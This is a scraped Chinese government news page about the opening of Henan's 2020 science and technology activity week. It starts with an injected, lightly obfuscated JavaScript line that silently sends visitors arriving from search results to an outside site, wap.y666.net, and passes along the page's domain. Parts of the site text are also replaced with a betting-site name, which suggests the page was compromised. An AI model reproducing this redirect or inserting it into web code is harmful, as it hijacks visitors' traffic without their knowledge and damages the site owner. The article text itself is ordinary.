var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

2020年河南省科技活动周启动


发布日期:2020-08-25 17:31来源:政策法规处(河南省国防动员委员会科技动员办公室) 阅读次数:

2020年河南省科技活动周启动

2020年河南省科技活动周启动

  为广泛宣传展示科技创新成就和科技战疫成效,大力弘扬科学精神,普及科学知识,促进科技创新和科学普及协调发展,推动科技创新成果和科学普及活动惠及于民,8月23日上午,以“科技战疫 创新强国”为主题的2020年河南省科技活动周启动仪式在新乡举行。

  本届科技活动周是根据2020年全国科技活动周的总体安排部署,由省科技厅、省委宣传部、省卫健委、省科协共同举办,在全省范围内组织开展了郑洛新国家自创区第二届军民协同创新创业大赛、2020年度河南省科普讲解大赛以及科技战疫成果展、双创成果展、科技大讲堂、科普使者进社区、科技特派员走进贫困村、科普大篷车等一系列丰富多彩的群众性科普宣传活动,充分展示科学技术对战胜疫情的重要支撑作用和系列成果,展示科技创新对经济社会发展的引领性作用。

  8月23-29日活动周期间,中国竞彩网有关大学、科研机构将面向社会公众开放,其中包括河南省疾控中心、中棉所国家重点实验室、省气象科学研究所、河南师范大学、河南科技大学、新乡医学院、郑州科技馆、郑州蔬菜研究所等60多家高水平创新平台和科普场所。全省各地各部门各单位也将利用各自优势资源,举办科普微视频大赛、科学实验展演大赛、优秀科普作品推荐、科技大讲堂、医疗小分队下乡健康义诊、科技特派员走进贫困村等活动。

  据初步统计,2020年全省科技活动周将有超万名科技人员深入街道社区、田间地头开展各种科技活动,参与群众可达百万人次。通过广泛宣传科技创新是引领发展的第一动力,让广大人民群众在参与中开拓科学眼界、在体验中学习科学知识、在互动中感受科技魅力,动员全社会提升全民科学素养,积极投身创新驱动发展战略,为经济高质量发展、中原更加出彩提供强有力的科技支撑。

2020年河南省科技活动周启动

2020年河南省科技活动周启动

2020年河南省科技活动周启动

2020年河南省科技活动周启动